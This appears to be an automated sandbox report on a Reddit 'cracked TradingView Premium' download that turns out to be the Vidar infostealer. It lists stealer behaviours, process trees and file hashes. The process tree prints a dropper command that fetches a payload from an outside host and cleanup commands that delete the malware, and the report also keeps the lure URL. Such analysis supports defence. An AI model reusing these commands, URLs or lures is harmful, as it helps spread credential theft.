Analysis

  • max time kernel
    135s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-10-2024 08:03

General

  • Target

    https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/

Malware Config

Signatures

  • Detect Vidar Stealer 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0ac646f8,0x7fff0ac64708,0x7fff0ac64718
      2⤵
        PID:708
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
        2⤵
          PID:5008
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2300
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
          2⤵
            PID:3976
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
            2⤵
              PID:1144
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
              2⤵
                PID:1216
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                2⤵
                  PID:4064
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
                  2⤵
                    PID:2612
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4988
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
                    2⤵
                      PID:4584
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5880 /prefetch:8
                      2⤵
                        PID:5016
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
                        2⤵
                          PID:4848
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
                          2⤵
                            PID:5248
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
                            2⤵
                              PID:5256
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
                              2⤵
                                PID:5416
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
                                2⤵
                                  PID:5424
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6484 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5616
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5188 /prefetch:2
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4980
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:548
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:3164
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:5880
                                    • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
                                      "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
                                      1⤵
                                      • System Location Discovery: System Language Discovery
                                      • Checks processor information in registry
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4184
                                      • C:\ProgramData\HJJDGH.exe
                                        C:\ProgramData\\HJJDGH.exe https://apklight.com/clips.exe
                                        2⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        PID:2776
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:6096
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:3348
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:5984
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4792
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4688
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:6112
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4276
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:2008
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:1072
                                        • C:\ProgramData\HJJDGH.exe
                                          C:\ProgramData\HJJDGH.exe
                                          3⤵
                                          • Executes dropped EXE
                                          PID:1716
                                        • C:\Windows\system32\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\ProgramData\HJJDGH.exe" & exit
                                          3⤵
                                            PID:2508
                                            • C:\Windows\system32\timeout.exe
                                              timeout /t 10
                                              4⤵
                                              • Delays execution with timeout.exe
                                              PID:5824
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IEHCAKKJDBKK" & exit
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1276
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 10
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Delays execution with timeout.exe
                                            PID:2584

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\ProgramData\HJJDGH.exe

                                        Filesize

                                        7KB

                                        MD5

                                        1fbd01ee768b7c4abfd2783a4707a072

                                        SHA1

                                        15288415ec755c2673da3c716386abfdd35aaaed

                                        SHA256

                                        0a6b558dc092b4f6bce802a6407fe468f7b973c82db36e2d7a0d0db5635838b4

                                        SHA512

                                        200e9ddc345d9a9014e4b8db1db4647ab247491de20deea02ee65a032f62c67cf46fa46fff19b2e2059ba9274a24d9ad12c55b14af9da2ccfb355a40875a8c5d

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                        Filesize

                                        152B

                                        MD5

                                        0a9dc42e4013fc47438e96d24beb8eff

                                        SHA1

                                        806ab26d7eae031a58484188a7eb1adab06457fc

                                        SHA256

                                        58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

                                        SHA512

                                        868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                        Filesize

                                        152B

                                        MD5

                                        61cef8e38cd95bf003f5fdd1dc37dae1

                                        SHA1

                                        11f2f79ecb349344c143eea9a0fed41891a3467f

                                        SHA256

                                        ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

                                        SHA512

                                        6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

                                        Filesize

                                        215KB

                                        MD5

                                        0e3d96124ecfd1e2818dfd4d5f21352a

                                        SHA1

                                        098b1aa4b26d3c77d24dc2ffd335d2f3a7aeb5d7

                                        SHA256

                                        eef545efdb498b725fbabeedd5b80cec3c60357df9bc2943cfd7c8d5ae061dcc

                                        SHA512

                                        c02d65d901e26d0ed28600fa739f1aa42184e00b4e9919f1e4e9623fe9d07a2e2c35b0215d4f101afc1e32fc101a200ca4244eb1d9ca846065d387144451331c

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                        Filesize

                                        4KB

                                        MD5

                                        7fca31e2be8d522833cee88b847293a5

                                        SHA1

                                        f9c9648fe4e77c724277427c54df245d27a405f5

                                        SHA256

                                        8f9ec698286fabaa171b36b9fd022171616d146036a7f0680cab63ee7125f5ac

                                        SHA512

                                        c3258ccd66458f3e335ba8b2cf793bbd98a9f91c56f3c83aeb4a967b14a799f7ca638b33d2166ac971f21dee5d9bbbc13b8d760817dbf31a226df0ce634c3c5b

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                        Filesize

                                        20KB

                                        MD5

                                        b0f47e9673a1a180755cc333f3266d30

                                        SHA1

                                        b2299fba1e5bac6f05ffb2fc8e01a6c84b016a0a

                                        SHA256

                                        f00939e7eebb6fd29ed0726cdb0c7bb912ff59ce78def67e535e023fae4124ac

                                        SHA512

                                        e1560353aec22894e5328a3c22655783b923c03f7dd4b0bbcd6a22d6e910c60ac388917717587c053987a6359437e25e3baa6b3e22ab181a91d55728954f6ce3

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                        Filesize

                                        124KB

                                        MD5

                                        2ac82a4f9d464915826d7887de1cd817

                                        SHA1

                                        da6d8cc624664bd7977b3e48543a90637adcc9c8

                                        SHA256

                                        19d1bdf82a963d394d3e7ac4e8023913ade4f4c5aa012a7edc0a05745fafe7c2

                                        SHA512

                                        25df0eb8318257ada11a918ec27c32f8d972ad0cbb2929912cebb8f1da8fbe175065db05ed324e4d21d6828648aed1d2519bdff2ef6530d5433cbfb32bcca377

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.reddit.com_0.indexeddb.leveldb\CURRENT

                                        Filesize

                                        16B

                                        MD5

                                        46295cac801e5d4857d09837238a6394

                                        SHA1

                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                        SHA256

                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                        SHA512

                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                        Filesize

                                        1KB

                                        MD5

                                        8277bab8df30add5321c4d288a27a3be

                                        SHA1

                                        96a91aa10dbe2c644acd6ac13690bf5de414eace

                                        SHA256

                                        840c5043279bcf8490e9754d89b74361b19ba9712bc7a4a9acf51cd4519664a6

                                        SHA512

                                        1532c2182db5ebaa5eb89728bab38a45e463cc0bf5cbd9cb0f7d79d4bf4dce0dcff4fd75fed50e120fffa9ab9166a103ff28e992a1e12f65c0e5c11970d839c1

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                        Filesize

                                        1KB

                                        MD5

                                        7bc40d5a7c3b3ad20b4d21ef0ead8677

                                        SHA1

                                        adacbb0b32e0e1471fd84a44da06c2b44629b38b

                                        SHA256

                                        1aeafb25c96a086da5e74da8c7d64a0b0a91f83ee842028ca6cbb070f7598c36

                                        SHA512

                                        b689886c455ab84f94cf63fc159c833f0f6569994414658ec48b6eda86e8e1a21771483f21ccffdaf5fb659d59433625d66bbac48692e3230298647f2bc4f337

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                        Filesize

                                        7KB

                                        MD5

                                        4196195f638bb483599fbbe47b1671a6

                                        SHA1

                                        f0f33132333bdab6c3ea4a7a6a2ff8654e357854

                                        SHA256

                                        9517e80c6dbb31a82ce8061d13d4811b3f21d88e62165098d933568d2adbe4b8

                                        SHA512

                                        3fdbda39e8e538743d12f21215459e08d90e4d267f37197db4a59ed42d103c6cc913102d56cc70ddeb935ca452569e3cc7b7b95babce4e3cc7a54094bc518c2b

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                        Filesize

                                        7KB

                                        MD5

                                        0b7a69ff1658f92e71b43b58db6b50ee

                                        SHA1

                                        ee3448b8aece08ae0166c5a55942ebc2ac75a16f

                                        SHA256

                                        4da400fc9d3bce59ae904b19e03be72304e1035b6f9989f19e1b1a961e3a2759

                                        SHA512

                                        5c5ae71d8a3b81535b4a2e846e4c2f95fa011d3be2066437ba13a37e4a216af4dc841eb6adb67e859cea20821917aefe0c2ff1deb7ff704499ca0bb62c2bf2b8

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                        Filesize

                                        5KB

                                        MD5

                                        5044a0bf8d3793d33f60fdbe04498282

                                        SHA1

                                        d7b604ac4424091619e7eaa8be8db08ca555f639

                                        SHA256

                                        365832a6c2d7aa243acf48342d782c7ff336492eb003b5bb26f9bf1b82f1e721

                                        SHA512

                                        228b1c5e33f78d2bb69e79257f8478559f27ea55b1499293f0c67cb89222680990eefe60afa7a58209846ae2ebde3f472c3014161337d3e638865c69323196a0

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                        Filesize

                                        72B

                                        MD5

                                        66173adc33e12e82b041247623454166

                                        SHA1

                                        e6ab64fc31e32e6ecd344426b0f1d5523a7cc3cf

                                        SHA256

                                        b2005a3fe2b119f580d7345d17f27a0b4aa3b80478ff4b3723da34c1204b69b5

                                        SHA512

                                        9b265431f3f95850d09f4f789407203528654b85a453be49abfb032e34c7e3212a2378e83d3926b76a3e94ee756cb088be9cbe322436e6bad3125e730f504d27

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d205.TMP

                                        Filesize

                                        48B

                                        MD5

                                        4c9b49fa9d3bc38039f1239dce2bce3d

                                        SHA1

                                        8572e33d248e7481bfd81a2a5254984c80a1db4a

                                        SHA256

                                        5ad85a8ad228dc413c46aec450e93bb1f8ac9c7134cfb1c128bddb141c087b2e

                                        SHA512

                                        85431a930208f4de2ed053e79d2ef93b8bc4dda6d34c6d8508c11faa525402e38e10b0093a4e524df9dccb57a3c282c930e49073f08d00f7bf8fe736aa439159

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                        Filesize

                                        537B

                                        MD5

                                        3e7548b8a316220fa95a47a30e2d6f55

                                        SHA1

                                        850b2615b91649f99d7990020469035545dc45c1

                                        SHA256

                                        994b6bee06454106f8da2b6d752e486e6bd92e36ccb555d56ebecb1c231be9fc

                                        SHA512

                                        7251a3fd1e457d31eed2a75e86a3b52606d4c70cc41d82fc528d0e4cbfc5909afda1ff8f6610ae8e172392f3338bab50e51a27c72940a61f34fadf0ab9ca12fe

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe589100.TMP

                                        Filesize

                                        537B

                                        MD5

                                        4b1f719972ae29978a0214f5b4bd9f87

                                        SHA1

                                        3ac90ec5a96eacf47aca955753e9cc4dfacb0bb0

                                        SHA256

                                        c8f959a3f1a12847cebc38f96f5aff7659f086b9aae2e0b30aea51f5d2c5b98a

                                        SHA512

                                        42ed80101aee556ce5a443f7d3991d57966ed625bbc87d9ed10c096f291989a9343622236596292790f19044228137f9ebd300c66be5d867e3c5d6ac69c4e37c

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                        Filesize

                                        16B

                                        MD5

                                        6752a1d65b201c13b62ea44016eb221f

                                        SHA1

                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                        SHA256

                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                        SHA512

                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        11KB

                                        MD5

                                        9bca4eeafa396118737e712557746c87

                                        SHA1

                                        efb7549d51bb8a2898ee2dbdfe3d8fa74fcb39f2

                                        SHA256

                                        e1e0c45605d3653e2bab076466b7bf4c25a29b420a0f1773fa33dd35630aae06

                                        SHA512

                                        2499b3c8722beee84f7536acacb1b653972e1df3e1b2f5a09767ee31ace6c8af7edb386c890114c6a07f0fddd5b6441488fe16bcb62b1fa678c0b0377d3a2079

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        11KB

                                        MD5

                                        5dab5d97cb052de6be99016585ee16ed

                                        SHA1

                                        533dc33c9f6c97c775c0c74c40f4a1b13ee7ac97

                                        SHA256

                                        483e4187c59708f1bd304fd2a359b14d720e0e725cc3a1119a6351a1092aec01

                                        SHA512

                                        50e12033fe86a7deac29bdce556e781ce774e65d0835db3525695adfaebd6cd99369eed82fb0c0240ac8e248d29f2d6d2775784844f16c0cf0bddfc065418efd

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        12KB

                                        MD5

                                        94255f6ba9e8fce53479319bed123698

                                        SHA1

                                        36aa2e4e7e68f5c3de14ca70b8ec912a859aa9e5

                                        SHA256

                                        f82e6b6911a8fd66414bc7f82365809e296ce1ee7fe31235734e359cb0d06d63

                                        SHA512

                                        8ee7efc828dbb5be8449fa57a3c446d0163e460d23b82f12144af25260adb71f3b2833fd2272088488f913bb661ce82437e12fe7cf6bdd32e2beff691c508c51

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8B3ZU6S9\clips[1].exe

                                        Filesize

                                        3.2MB

                                        MD5

                                        591e2268cf72d349e9b46eddeb65db1e

                                        SHA1

                                        682f4e6840ff963a142e551a9ffc522a50826d61

                                        SHA256

                                        b94f9fa3f084671c30fd0f2c660d580046a480a8ae2790d6da29ab092973d36b

                                        SHA512

                                        f3a537dd310c41f491589d90dc18e97bff5bb16358ccce104ba1fd10d6c026dcddc955c65a19b269fe3a88d0b6cff94e71a68300107278b152c0b831e4c34567

                                      • memory/4184-394-0x0000000003E80000-0x0000000003E81000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4184-397-0x0000000003EB0000-0x0000000003EB1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4184-398-0x0000000000150000-0x00000000014A9000-memory.dmp

                                        Filesize

                                        19.3MB

                                      • memory/4184-406-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                        Filesize

                                        972KB

                                      • memory/4184-396-0x0000000003EA0000-0x0000000003EA1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4184-395-0x0000000003E90000-0x0000000003E91000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4184-393-0x0000000003E70000-0x0000000003E71000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4184-392-0x0000000003E40000-0x0000000003E41000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4184-391-0x0000000003E30000-0x0000000003E31000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4184-487-0x0000000000150000-0x00000000014A9000-memory.dmp

                                        Filesize

                                        19.3MB

                                      • memory/4184-390-0x0000000000150000-0x00000000014A9000-memory.dmp

                                        Filesize

                                        19.3MB